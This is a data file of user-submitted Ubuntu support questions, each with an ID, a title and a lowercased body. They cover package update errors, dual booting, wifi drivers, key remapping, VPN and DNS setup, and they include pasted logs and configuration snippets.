237417	problem ca n't change download server only returns to main server	i have some problem . i ca n't change download server on ubuntu . i have only us server or main server . why ? cause i ca n't update ubuntu cause 404 not found please help me ! greetz erazer -edit , yes i tried to ping its work , there are problem with server , but i have internet connection . i found it on another solution to change main server to other server , but i ca n't even change it . here comes a log from terminal . fetched 228 kb in 13s ( 16.7 kb/s ) w : gpg error : http : //http.us.debian.org sid inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey aed4b06f473041fa w : failed to fetch http : //archive.getdeb.net/ubuntu/dists/-getdeb/release.gpg unable to connect to archive.getdeb.net : http : w : failed to fetch archive.getdeb.net/ubuntu/dists/-getdeb/games/binary-i386/packages unable to connect to archive.getdeb.net : http : w : failed to fetch archive.getdeb.net/ubuntu/dists/-getdeb/apps/binary-i386/packages unable to connect to archive.getdeb.net : http : w : failed to fetch archive.getdeb.net/ubuntu/dists/-getdeb/apps/i18n/translation-en_us unable to connect to archive.getdeb.net : http : w : failed to fetch archive.getdeb.net/ubuntu/dists/-getdeb/apps/i18n/translation-en unable to connect to archive.getdeb.net : http : w : failed to fetch archive.getdeb.net/ubuntu/dists/-getdeb/games/i18n/translation-en_us unable to connect to archive.getdeb.net : http : w : failed to fetch archive.getdeb.net/ubuntu/dists/-getdeb/games/i18n/translation-en unable to connect to archive.getdeb.net : http : w : failed to fetch us.archive.ubuntu.com/ubuntu/dists/wheezy-updates/restricted/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch us.archive.ubuntu.com/ubuntu/dists/wheezy-updates/main/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch us.archive.ubuntu.com/ubuntu/dists/wheezy-updates/multiverse/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch us.archive.ubuntu.com/ubuntu/dists/wheezy-updates/universe/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http.us.debian.org/debian/dists/sid/universe/binary-i386/packages 404 not found [ ip : 128.61.240.89 80 ] e : some index files failed to download . they have been ignored , or old ones used this is one of terminal with command sudo apt-get update and i ca n't show my full log terminal cause rules of ubuntu i removed http : // to even can post it .
237421	how can i uninstall ubuntu 12.10 if i installed it with the windows installer ?	i want to install ubuntu 12.10 but i want to know before how can i uninstall it and return only to windows and do n't have ubuntu and windows together .
237422	gimp tries to access a scanner each time gimp gets started . how can i disable this ?	each time i start gimp , gimp is invoking a command to my epson photoscanner . how can i disable this behavior ? as the scanner is n't connected ( most of the time ) , i always get a message that sending a command to the scanner failed . the program invoked is iscan , the standard program for using the epson photoscanner .
237428	12.10 wo n't boot on efi	i had 12.04 lts 32 bit alongside windows 7 home premium 64 bit . windows uses efi . when i noticed that i had ubuntu in 32 bit i decided to install 12.10 64 bit . i wanted to install an upgrade to keep my settings of thunderbird and firefox ( data is stored on windows partitions ) . the installer found efi but told me that something went wrong with grub . i used boot repair and got the following link : http : //paste.ubuntu.com/1507240 i hope someone can find the error and help me fix it . thanks in advance . sincerely yours , zuversicht
237432	my ubuntu is a slower than windows , what could be causing this lack of performance ?	i have recently moved to ubuntu , following some tutorials on internet i have installed a 12.10 version of ubuntu in a partition and it went very well . in the other partition is wndows 7 . both were installed the same day and i have no other files , such as music , videos etc . it happens that ubuntu is very slow at working ( to open programs etc ) , and when there are more than two opened it gets even slower and sometimes gets frozen when a message appears saying that compiz had to be closed . although it is working well windows is a little faster . my pc is a laptop with 320gb hd , 4gb ram , intel core 2 duo 2.1 ghz . another question is that the higher resolution for video i can get is 1024 , while on windows it is 1280 . please help me , i do n't know what else i can do to make my ubuntu install faster . output of command lspci -nnk | grep -ia2 vga 01:00.0 vga compatible controller [ 0300 ] : silicon integrated systems [ sis ] 771/671 pcie vga display adapter [ 1039:6351 ] ( rev 10 ) subsystem : clevo/kapok computer device [ 1558:0801 ] 03:00.0 system peripheral [ 0880 ] : jmicron technology corp. sd/mmc host controller [ 197b:2382 ] thanks for helping
237434	remapping keys on apple keyboard	i 'm using the german apple keyboard for both macos x and ubuntu 12.10 . $ lsbusb ... bus 002 device 004 : id 05ac:0250 apple , inc. mp110z/b i 've successfully remapped the exchanged < and ^ keys with these lines in .xmodmap : keycode 49 = less greater less greater bar brokenbar bar keycode 94 = dead_circumflex degree dead_circumflex degree u2032 u2033 u2032 nevertheless only the right alt key is working . i want to exchange them or make them both work . any ideas ?
237436	pptp vpn on ubuntu server 12.10 fails to connect , with error : no ifupdown configuration found	i am trying to setup a pptp vpn server on ubuntu server 12.10 . i had a few errors and by observing the logs , i managed to solve them . now , i get this error , and it seems i am not able to find a solution to it . here is the out put of tail -n 30 /var/log/syslog | grep -i ppp : jan 7 22:55:17 myserver pptpd [ 32719 ] : ctrl : starting call ( launching pppd , opening gre ) jan 7 22:55:17 myserver pptpd [ 32720 ] : ctrl ( pppd launcher ) : program binary = /usr/sbin/pppd jan 7 22:55:17 myserver pptpd [ 32720 ] : ctrl ( pppd launcher ) : local address = 192.168.0.1 jan 7 22:55:17 myserver pptpd [ 32720 ] : ctrl ( pppd launcher ) : remote address = 192.168.0.234 jan 7 22:55:17 myserver pppd [ 32720 ] : plugin /usr/lib/pptpd/pptpd-logwtmp.so loaded . jan 7 22:55:17 myserver pppd [ 32720 ] : pppd 2.4.5 started by root , uid 0 jan 7 22:55:17 myserver pppd [ 32720 ] : using interface ppp0 jan 7 22:55:17 myserver pppd [ 32720 ] : connect : ppp0 < -- > /dev/pts/3 jan 7 22:55:17 myserver networkmanager [ 1122 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) jan 7 22:55:17 myserver networkmanager [ 1122 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . jan 7 22:55:46 myserver pptpd [ 32719 ] : ctrl : reaping child ppp [ 32720 ] jan 7 22:55:46 myserver pppd [ 32720 ] : hangup ( sighup ) jan 7 22:55:46 myserver pppd [ 32720 ] : modem hangup jan 7 22:55:46 myserver pppd [ 32720 ] : connection terminated . jan 7 22:55:46 myserver networkmanager [ 1122 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) jan 7 22:55:46 myserver pppd [ 32720 ] : exit . can anyone help me with this ? edit as i said my server is ubuntu server 12.10 . client is kubuntu 12.10 . i have successfully set up a pptp vpn server on centos 6 , but i failed to do so on ubuntu .
237437	prevent ubuntu 10.04 from locking display after few minutes of inactivity	my system is ubuntu 10.04 lucid lynx . i looked under system/preferences/power management and everything is set to never . how do i change settings so i can let the screen stay on at least for 30 minutes or whatever i need ?
237441	why does update manager not work when ppa is unavailbale ?	i have several ppas in my package list . apparently , some of these are not accessible anymore after the last system upgrade . now when i update the update manager it tells me that it can not update the remaining packages due to unavailability of the repositories . why is that happening and the application does not have a possibility to bypass the inaccessible packages ? what can be done to re-enable the update manager 's functionality ?
237443	unable to login to bash after editing .bash_profile	i 've fiddled around with my .profile and .bash_profile to speed up some stuff : path= $ path : /home/yoshi/android-sdk-linux/platform-tools first i appended the line to my .profile and perfect . then i 've read the comments : > # this file is not read by bash ( 1 ) , if ~/.bash_profile or ~/.bash_login > # exists . good idea ! so i 've moved it over there ( had to create it ) . and that 's how this trouble started . i edit via nano , closed file and terminal window . started new window from the launcher and get a lonely cursor blinking on a blank screen . no typical foo @ bar : ~ $ . same problem when switching to a tty session . rebooting was possible and now i can login to a tty shell though it 's staying blank first and i 've to interrupt something ( ? ) via ctrl+c . sadly this magic does n't work on unity 's terminal . : ( the relevant part of my .profile . i 've removed .bash_profile . # if running bash if [ -n `` $ bash_version '' ] ; then # include .bashrc if it exists if [ -f `` $ home/.bashrc '' ] ; then . `` $ home/.bashrc '' fi fi # set path so it includes user 's private bin if it exists if [ -d `` $ home/bin '' ] ; then path= '' $ home/bin : $ path '' fi
237444	bluetooth mouse not working	my iball bt333 bluetooth is not working on my ubuntu 12.10 . i paired it using the bluetooth wizard and the pairing is shown as successful but the mouse does not work at all . please help and if you require additional info , i 'll provide it .
237445	2x ssd like one drive 12.10	i want to do a clean install of ubuntu 12.10 . i got 2x 40gb ssd 's . i want to have them like one drive . ( like raid0 ) , is there a way to do this with lvm , in the graphical ubuntu 12.10 installation ? i know i can do this with ubuntu server , raid0 and then installing the ubuntu-dekstop package .
237449	how to re-partition ubuntu	i have a 750 gb hard drive and it 's been entirely dedicated to my ubuntu installation . i want to make 2 100 gb partitions for two other oses and i 'm not sure how to make these partitions . how do i go about doing so ?
237451	phpmyadmin stuck in apt-get	so i tried to install phpmyadmin , but it got stuck , so i needed to force shut it down ... now when i try to install any software using apt-get install i get an error : e : could not get lock /var/cache/apt/archives/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/cache/apt/archives/ when i do a sudo dpkg -- configure -a it says : setting up phpmyadmin ( 4:3.4.11.1-1 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing phpmyadmin ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : phpmyadmin please tell me how to fix this , and how to install mysql on the right way .
237461	how do i access ubuntu server running in virtualbox from outside	i have installed ubuntu server 12.04 lts on my laptop via virtualbox . i have installed lamp , openssh , mail server . as i logged in , i ran ifconfig . it gave me the inet address as 192.168.0.3 . so , this should be the address through which i should be able to access the server right ? but i am not able to access it via browser.. server is up on virtualbox all the time -- but still , its not working on other browsers , or my mobile . what do i have to do to make it accessible to the public ?
237470	how do i output my usb audio input ?	i have a record turntable which has an audio output cable so i 've connected it to my 12.10 box . says there 's no drivers required and checking pulse audio i can see that there is sound coming in whenever i play a record . however i ca n't seem to output that through my headphone or speaker ports . i 've tried using alsamixer and unmuted line in which did n't do much . can you please help me out ? i may have missed something glaringly obvious . but i 've checked all the sound settings .
237472	weak wifi signal on lenovo g series	i 've just installed ubuntu 12.10 on my lenovo laptop and the wifi signal reception changed completely . i had windows installed on it first and it had no problem connecting to my home network from my bedroom ( to a router in another room ) . now it only finds the network if i step outside the room . an other computer in my room and my smartphone find the network and connect without any difficulties .
237474	ca n't select wifi ca on ubuntu 12.10 ( gnome3 )	i have a fresh installation of ubuntu 12.10 on a packard bell notebook , with gnome3 instead of unity . now when i try to connect to a wpa/wpa2 enterprise secured wlan ( peap authentication , mschapv2 as inner authentication ) , after entering the login details i 'm prompted to either select a root ca or ignore the message . but i ca n't hit the buttons or tick the box to not ask again this question . it 's completely unselectable , so i end up not being able to connect to the wifi . i also tried to select the ca before trying to connect , but what happens then is that the prompt appears while the system starts connecting to the wifi . unfortunately , it fails to do so . if you know a way to connect to a wifi with such configuration , i 'm also happy with that . the used ca would be the entrust.net secure server certificate authority .
237475	does 64bit ubuntu takes more memory than 32bit or is `` quantal '' more demanding than `` precise '' ?	i 've just clean-installed 12.10 64bit and i noticed an increase in memory usage . i used 12.04 32bit and was running about ~400mb on startup ( gnome3 no effects ) + firefox , now the machine uses about ~600 mb .
237477	seemingly random system crashes on ubuntu 12.04	edit : oops , do n't know why i originally said 12.10 . this is 12.04 . this is a work laptop and i did n't really use it over the christmas break ( 22nd to jan 1st ) . however , i have had three complete system crashes ( jan 3rd , 4th and 7th ) since coming back . the complete system crash is everything will become unresponsive . no mouse/keyboard input . i have a system monitor indicator that will stop updating on screen . ca n't move to a terminal session with ctrl+alt+f1 , 2 , 3 , 4 , 5 or 6 . not responding to pings or ssh connections . lastly , it is a system76 serval professional 7 . two light indicators on the laptop will just be flashing ( caps lock and i believe screen lock lights ) . in addition , i ca n't find anything in logs related to it and the syslog has actually not updated anything since december 18th 9:17 . that seems problematic that syslog has no updates have occurred since then . lastly , i did have some ubuntu package updates right around that time : $ zless /var/log/apt/history.log.1.gz ... start-date : 2012-12-18 09:21:00 commandline : aptdaemon role='role-commit-packages ' sender=':1.82' install : linux-headers-3.2.0-35 : amd64 ( 3.2.0-35.55 ) , linux-image-3.2.0-35-generic : amd64 ( 3.2.0-35.55 ) , linux-headers-3.2.0-35-generic : amd64 ( 3.2.0-35.55 ) upgrade : linux-generic : amd64 ( 3.2.0.34.37 , 3.2.0.35.40 ) , supermeatboy : amd64 ( 1.1-0ubuntu3 , 1.1-0ubuntu4 ) , apport : amd64 ( 2.0.1-0ubuntu15 , 2.0.1-0ubuntu15.1 ) , python-problem-report : amd64 ( 2.0.1-0ubuntu15 , 2.0.1-0ubuntu15.1 ) , linux-headers-generic : amd64 ( 3.2.0.34.37 , 3.2.0.35.40 ) , linux-image-generic : amd64 ( 3.2.0.34.37 , 3.2.0.35.40 ) , python-apport : amd64 ( 2.0.1-0ubuntu15 , 2.0.1-0ubuntu15.1 ) , linux-libc-dev : amd64 ( 3.2.0-34.53 , 3.2.0-35.55 ) , unity-lens-applications : amd64 ( 5.12.0-0ubuntu1 , 5.18.0-0ubuntu1 ) , apport-gtk : amd64 ( 2.0.1-0ubuntu15 , 2.0.1-0ubuntu15.1 ) end-date : 2012-12-18 09:23:54 ... let me know if i can supply anything else . thanks .
237481	installing and word docs etc	looking at installing ubuntu but need some more info . if i install it does it remove my windows 7 programme or can swap from one to the other ? will i be able to use the programmes already installed on my computer ?
237482	d-link dwl-g122 network	i 'm starting downloading ubuntu now , and i have a doubt , my computer needs a usb stick with wireless network to achieve .. and anyone know where i can download the drivers for this model ? or does anyone know how to solve this ? the model is d-link dwl-g122 . i 'm sorry if this question has here , i 'm posting before searching . thank you : ) and sorry for my bad english , it 's because i 'm a brazilian guy : ) .
237485	ran sudo fuser -cuk /var/lib/dpkg/lock ; sudo rm -f /var/lib/dpkg/lock now the keyboard or the mouse does not work on login screen	title pretty much says it all . i was refered with another problem i had to a answer which said i should do that command . now the drivers seems to be uninstalled . i ca n't move the mouse or the keyboard when i come to the login screen . it works in grub though .
237511	restoring backups with duplicity	i backed up my /home folder to an external hard drive and now i 'm trying to restore it on a fresh install . when i try to restore with deja dup , it takes about 15 seconds then says it was successful . but none of my files are anywhere to be found . so i 'm trying it with duplicity . the help file says to create a file called /tmp/restore . is it possible just to put the files where they are supposed to be ? in my /home ?
237512	can not update from 10.04 to 12.04	update manager wo n't run and breaks and i get a held packages message . i ca n't open update manager from system > admin . i have looked through the forums and tried multiple commands in terminal to solve the problem .
237514	launch a program keeping focus on terminal	i 'm making a script that combines taking input from the command line with the launch of other programs . so the script will go like this : ... launch program read input from the terminal ... the problem is that when i launch the program ( even if i launch it in the background ) , the terminal looses focus and the launched program becomes active . how do i launch a program keeping the focus on the terminal with a default ubuntu command ? thank you
237515	package combined c++/python software	i would like to package a software that contains both c++ and python code . the c++ headers and libraries compile fine on launchpad and are properly installed ( thanks to some .install files ) . on the python side of things , the names of the ( raw ) install files would be /build/buildd/trilinos-11.1~20130107/debian/tmp/usr/lib/python2.7/dist-packages/pytrilinos/aztecoo.py /build/buildd/trilinos-11.1~20130107/debian/tmp/usr/lib/python2.7/dist-packages/pytrilinos/aztecoo.pyc /build/buildd/trilinos-11.1~20130107/debian/tmp/usr/lib/python2.7/dist-packages/pytrilinos/_aztecoo.so what 's the proper way to have them installed ? should i also create an .install file listing those files , or is there way to use dh_python2 ?
237516	multiple errors while installing acroread on ubuntu 12.10 64b	from here i obtained the latest deb file , double-click that opens software center and click install . i got : the package is of bad quality the installation of a package which violates the quality standards is n't allowed . this could cause serious problems on your computer . please contact the person or organisation who provided this package file and include the details beneath . detail providd is posted here . on the same popped up window there 's an option to `` ignore and install '' which i very much hesitate to go on with . also with the same .deb file i tried from commandline as suggested here : sudo dpkg -i adberdr9.4.6-1_i386linux_enu.deb which yields : userdayo @ ubuntu : ~ $ sudo dpkg -i adberdr9.5.3-1_i386linux_enu.deb ( reading database ... 197960 files and directories currently installed . ) unpacking adobereader-enu ( from adberdr9.5.3-1_i386linux_enu.deb ) ... dpkg-deb ( subprocess ) : can not copy archive member from 'adberdr9.5.3-1_i386linux_enu.deb ' to decompressor pipe : unexpected end of file or stream dpkg-deb : error : subprocess paste returned error exit status 2 dpkg : error processing adberdr9.5.3-1_i386linux_enu.deb ( -- install ) : can not copy extracted data for './opt/adobe/reader9/reader/intellinux/bin/acroread ' to '/opt/adobe/reader9/reader/intellinux/bin/acroread.dpkg-new ' : unexpected end of file or stream processing triggers for man-db ... errors were encountered while processing : adberdr9.5.3-1_i386linux_enu.deb ia32-libs is installed per suggestion here . env ) ubuntu 12.10 ( tested on 2 machines , 1 is notebook 1 is virtual machine ) 64 bit any idea to work around ? thank you .
237517	how to run - from firefox context menu - terminal commands selected in web pages ?	instead of copying it from the web and pasting it in the terminal , i want to be able to select a command displayed in a web page and with right click context menu to add it and run it in terminal . some firefox addons were supposed to do this , as described here , but they do not seem to work in latest firefox . are there other solutions for this ? the result should look like this
237518	lugaru game does n't go full screen in 12.10	when you try to go full screen for full resolution , the task panel and the unity bar stay in place . while in 12.04 , the game goes into full screen . why does this happen in 12.10 ? is there a way to fix this ?
237519	why wo n't ubuntu install on my hp6910 laptop ?	i have tried almost everything and ubuntu will not install on my laptop . i am using the bootable usb method thus far and when i insert the flash drive in and change the boot order to flash drive the laptop powers up and asks what language you want ubuntu to install and i select however from there the entire thing just locks up . i dont know what to do , the laptop i am attempting to install it on has no os on it and that hard drive is brand new . i 've tested the hd and it passes . what would cause the installation to lock up ?
237521	12.10 lexmark s605 insecure permissions error	the s605 printer from lexmark is found and there is a provided option for the s600 series when installing it . however , after the installation process it says it needs the program /usr/lib/cups/filter//usr/local/lexmark/v3/bin/printfilter . now i know , that the downloadable packages from lexmark contain this file in a debian package , so i could use it from there , but : what does the structure above mean ? ... //usr/local/ ... are these two different locations ? and has the file to be in both ? thanks in advance , it 's impressive how you guys actually know what you 're doing ( in contrary to mac or most windows users . ) update : after installinge the packages from lexmark ( which are for 12.04 ) it says at printer state : idle ... /printfilter has insecure permissions ( 0100775/uid=0/gid=0 ) . can i modify the printfilter ? do i need to set up an administrative group ? i read a guide somewhere , but did n't follow it for some reason i forgot .
237523	how can i uninstall grub and get back my mac bootscreen ( refit ) ?	i 've partitioned the drive on my mac mini 5,1 so that it 's half macos mountain lion and half ubuntu . i had it dual-booting for a little while with refit , but when i reinstalled ubuntu from a usb live disk , it wrote grub to the /dev/sda boot area , and now i 'm not getting a mac boot screen at all , and the grub options to boot into macos do n't work . how can i restore the refit ( mac ) bootloader , so that i can boot back into macos ?
237525	intermittent `error : can not open display : localhost:10.0` with vagrant	i 've set up a vagrant vm with x forwarding . i 'm connecting to it with the following command ( to improve x performance ) : ssh -c arcfour , blowfish-cbc -xc vagrant @ vm-name this works fine ; i log into the vm and whenever i launch an x windows application it is rendered in my local x client . however , after around 15 - 30 minutes use , i start getting the following error when launching x windows applications : vagrant @ vm-name : ~/ $ firefox error : can not open display : localhost:10.0 this persists until i disconnect my ssh connection and reconnect . oddly , any x windows applications i 've already launched keep running normally . the error happens regardless of whether i 'm using tmux or not . my system details are as follows : host mac os x 10.7.5 virtualbox 4.2.6 r82870 client ubuntu 12.04 ( precise ) kernel 3.2.0-35-generic ( # 55-ubuntu smp wed dec 5 17:42:16 utc 2012 ) xorg 1.11.3 ( 29 august 2012 12:12:33am ) i 've installed the full ubuntu-desktop package on the vm . any ideas on how to fix this ? i 've found plenty of documentation and issue reports surrounding x forwarding not working at all , but nothing relating to eventual failure . n.b : i have upgraded my ssh client and xquartz to the very latest versions but the problem persists . it does not happen , however , if i use the regular vagrant ssh command to connect to the vm .
237529	how can i use box.com to sync my home directory across machines ?	box.com does not support linux , although there is a feature request with enthusiastic support . the comments to the feature request provide a number of ways to use box with linux , by mounting a webdav folder . here are some example solutions using webdav or otherwise : http : //maketecheasier.com/auto-mount-box-net-to-linux-desktop/2012/03/27 http : //dev.modmancer.com/index.php/2011/12/17/access-box-com-box-net-from-your-ubuntu/ boxlinux : https : //github.com/sebastiansam55/boxlinux conduit https : //live.gnome.org/conduit would any of these solutions be reasonably stable and bug-free ? of course there are other great services ( ubuntuone , dropbox , etc ) , but my institution has signed up for box ( and i thus have the space that i will require ) .
237532	how i can access my software from ubuntu ?	i installed ubuntu on my windows operated laptop . i can not find my software . i can not find google chrome . i can not find my pictures ( the pictures folder is empty ) , i can not find my dropbox , or any of the icons and links that i had in my desktop . how do i customize firefox so it will open the pages i want by default . where are my bookmarks ? can i use apache openoffice instead of the system you are offering here ? i really would like to use ubuntu , but i was forced to return to windows so i could work . i would appreciate your comments and suggestions .
237535	how to set up wireless linksys card on ubuntu 12.10 ?	i am a noob and i just installed ubuntu 12.10 . the wireless card i am using and a bit outdated ( linksys wmp54g ) , but it has been working when i was using windows , up until i installed ubuntu . i tried to load the drivers from the manufacturer 's disk i have , but but it is not being recognized . any help will be appreciated and again , i can not emphasize enough that i am a noob .
237540	launching a program with several files through terminal expansion problem	i 'm making a program that launches vlc with a set of files saved in a variable . but it does n't work it seems to have a problem with the names , what is weird ( for me ) is that in the end the problem is summed up by this : echo $ launcher # '' /home/ ... /file1.m4a '' `` /home/ ... /file2.m4a '' vlc $ launcher vlc $ ( echo $ launcher ) # does n't work vlc `` /home/ ... /file1.m4a '' `` /home/ ... /file2.m4a '' # works ! ! so what am i doing wrong ? by the way i need the quotes for the spaced named files thanks . here is how i set the launcher : i have an array with the selected folders that contain the files you want to reproduce , then i create an array of files of those folders : extension_string= '' . * ( m4a|mp3|wma|flac ) $ '' for i in `` $ { dir_list [ @ ] } '' ; do while isf= read -r -d $ '\0 ' file ; do files_list+= ( `` $ file '' ) done < < ( find `` $ i '' -type f -regextype posix-extended -regex `` $ extension_string '' -print0 ) done
237542	dual boot ubuntu 12.10 and windows 8 using windows installer	i really want to avoid making costly mistakes . how can i do this using the windows installer provided by ubuntu . specifically , i 'm afraid to get past the `` reboot '' screen during the installation process .
237544	how to make digikam remember google 's two-factor authentication password ?	i use digikam on kubuntu 12.10 to organise my photos and really like being able to upload to picasaweb using kipiplugins . unfortunately after having set up google two-factor authentication i now need to create an application specific password each time i want to upload from digikam . this behaviour is a bug which seems to have been fixed upstream according to https : //bugs.kde.org/show_bug.cgi ? id=292223 in digikam 2.7.0 . i am using digikam 2.8.0 on kde development platform 4.9.5 , with libkipi 1.6.0 ( according to digikam ) . is there a reason why this bug-fix seems not to have been applied to my version of digikam ? i have been upgrading rather than reinstalling , so is there some config file or token file that needs to be deleted to allow the correct behaviour ? alternatively is there a ppa version of digikam with this functionality available ?
237545	how can i reliably kill / restart xbmc in a way my mom can use ?	i have a laptop running ubuntu and xbmc for my parents can use . occasionally , xbmc will freeze and they have no way of restarting xbmc . the desktop is unresponsive . if this was on windows , my parents would hit ctrl-alt-del , kill xbmc , and reopen it . if this was me , i 'd drop into shell and run pkill xbmc . i need a method my parents can use on ubuntu . restarting the laptop every time xbmc freezes is not an option . i tried running xkill , but it complained that it ca n't grab cursor . i rebound task monitor to ctrl-alt-del , but it does n't work when the system is locked up . i 'm open to any suggestions .
237546	add an entry for ubuntu on windows 8 boot loader	i have installed ubuntu 12.10 by creating free space in windows 8 and then using that space to create 3 partitions , one for swap , one for grub ( mounting point is /boot ) and one for the actual os . i did this so the windows 8 boot loader would n't be overwritten in case i ever wanted to remove ubuntu . i can still boot into ubuntu if i select the boot loader from the bios . i want to add ubuntu to the windows 8 boot loader and i 've been told to use easybcd . the issue with that is it does n't actually direct windows to the grub file , but rather to something like autogrub0.mri . i have found another programme called visual bcd which will allow me to actually set the bootloader paths and drives . from here , i do n't quite know what to do . i believe i have it set to the correct drive but i do n't know if i 'm directing to the right file . i think it 's /boot/grub/x86_64-efi/grub.efi . i do n't know if that 's the right file , if i need to remove /boot or if the / need to be \ as that 's what windows uses . sorry for such a lengthy post , please help !
237555	libreoffice equivalent to ms excel table	im new tolibreoffice and i 'm looking for something similar to a excel table , which allows you to autofill formulas in a column without having to do it yourself . any answer is appreciatted . tx .
237557	mouse click not working on open apps	i am having issues with 12.10 . the mouse seems to work on some parts of ubuntu and not others . for example , i can open apps using the left home bar thing , and if they are full-screen , with the button , i can navigate through folders , but if i open a web browser , i can not click on anything in the browser , though i can use the keyboard and tab around . if the web browser is also not full screen , and the close/min/max buttons are on the top right , in black , i can not use them . when this is the case , the mouse is not at all frozen . i can move the cursor freely , open new apps , navigate through ubuntu , only can not click in any open apps with the mouse . there is nothing wrong with the mouse , as it works great on windows , and i have tried both my rat 7 and performance mx wireless mouses , to the same effect . my hardware : p8z77-v_lx mobo , i5 3570k , 16gb ram ( ddr3 1600mhz ) , booted off patriot pyro ssd 120gb , integrated graphics 4000 ( yeah , yeah , i 'm getting something when i can afford it . built for upgradeability ) dualboot windows 7 pro & ubuntu 12.10
237559	poor wireless quality with a realtek rlt8187	i 'm using a toshiba satelite l300d laptop that came preinstalled with windows vista but since i changed to ubuntu i have n't been able to have a good wi-fi signal even with 2-3 bars . i 'm new to using ubuntu and was hoping that there may be a resolution to this problem . my ethernet/ wi-fi drivers are : *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 02 serial : 00:1e:33:4c:8b:6f size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:44 ioport:3000 ( size=256 ) memory : f1010000-f1010fff memory : f1000000-f100ffff *-network description : wireless interface physical id : 1 bus info : usb @ 1:6 logical name : wlan0 serial : 00:21:63:28 : b8:3b capabilities : ethernet physical wireless configuration : broadcast=yes driver=rtl8187 driverversion=3.5.0-21-generic firmware=n/a ip=192.168.1.68 link=yes multicast=yes wireless=ieee 802.11bg as i am new to ubuntu any help will be appreciated .
237560	problem with dns	i 'm currently experiencing a issue with my dns , affecting 'host ' and 'apt-get ' . the contents of my /etc/network/interfaces ; auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 10.0.0.14 netmask 255.255.255.0 gateway 10.0.0.1 dns-nameservers 75.75.75.75 75.75.75.76 cat /etc/resolv.conf nameserver 75.75.75.75 nameserver 75.75.75.76 cat /etc/resolvconf/resolv.conf.d/base namerserver 75.75.75.75 cat /etc/resolvconf/resolv.conf.d/original nameserver 75.75.75.75 any assistance would be greatly appreciated .
237564	remap right alt to behave as right ctrl	i 'm trying to remap my right alt to behave like my right ctrl so i can use my right thumb to press the ctrl button . this is ubuntu 12.04 . i 've created the file .xmodmap in my home folder with the following content : clear control clear mod1 ! keycode 64 = alt_l meta_l keycode 108 = alt_r meta_r add control = control_l control_r alt_r add mod1 = alt_l meta_l as you might guess , my left alt key has keycode 64 and my left alt key has keycode 108 . this actually works in the sense that my right alt key behaves as if i press the ctrl key . however my left alt key now does n't do anything anymore , which means i do n't have an alt key left . this is strange given that xmodmap gives the following output : xmodmap : up to 4 keys per modifier , ( keycodes in parentheses ) : shift shift_l ( 0x32 ) , shift_r ( 0x3e ) lock caps_lock ( 0x42 ) control control_l ( 0x25 ) , control_r ( 0x69 ) , alt_r ( 0x6c ) mod1 alt_l ( 0x40 ) , alt_l ( 0xcc ) , meta_l ( 0xcd ) mod2 num_lock ( 0x4d ) mod3 mod4 super_l ( 0x85 ) , super_r ( 0x86 ) , super_l ( 0xce ) , hyper_l ( 0xcf ) mod5 iso_level3_shift ( 0x5c ) , mode_switch ( 0xcb ) the strange thing is that when i remove the alt_r mapping onto control the alt keys work ( ie. , change the second to last line to : ) add control = control_l control_r now even my right alt behaves as an alt key which confuses me . after removing the alt_r mapping from the control line the output of xmodmap gives : xmodmap : up to 4 keys per modifier , ( keycodes in parentheses ) : shift shift_l ( 0x32 ) , shift_r ( 0x3e ) lock caps_lock ( 0x42 ) control control_l ( 0x25 ) , control_r ( 0x69 ) mod1 alt_l ( 0x40 ) , alt_l ( 0xcc ) , meta_l ( 0xcd ) mod2 num_lock ( 0x4d ) mod3 mod4 super_l ( 0x85 ) , super_r ( 0x86 ) , super_l ( 0xce ) , hyper_l ( 0xcf ) mod5 iso_level3_shift ( 0x5c ) , mode_switch ( 0xcb ) hope you guys can help , ps . i used this website as a source
237570	internet very slow on wireless ubuntu 12.04	im facing a peculiar problem with ubuntu 12.04 . when i 'm on wireless all my webpages load very very slowly but videos + transmission downloads are very fast ( actual speed ) . i tried all fixes - upgrade kernel , ipv6 disabling , wifi-n diabling etc.. this happened suddenly without me making any changes to network settings . eralier it was working flawlessly . also when i run a windows vm on top of this ubuntu 12.04 there the webpages run very fast ( like normal ) .. so stuck on how to fix this issue.. my o/p of lshw : - $ lshw -c network warning : you should run this program as super-user . *-network description : ethernet interface product : 82579lm gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 04 serial : 5c:26:0a:6f:88 : c5 width : 32 bits clock : 33mhz capabilities : cap_list ethernet physical configuration : broadcast=yes driver=e1000e latency=0 multicast=yes resources : irq:20 memory : e6700000-e671ffff memory : e6780000-e6780fff ioport:5040 ( size=32 ) *-network description : wireless interface product : centrino advanced-n 6205 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 34 serial : a0:88 : b4 : ca:26 : fc width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-26-generic firmware=17.168.5.3 build 42301 ip=192.168.1.6 latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:44 memory : e6600000-e6601fff warning : output may be incomplete or inaccurate , you should run this program as super-user .
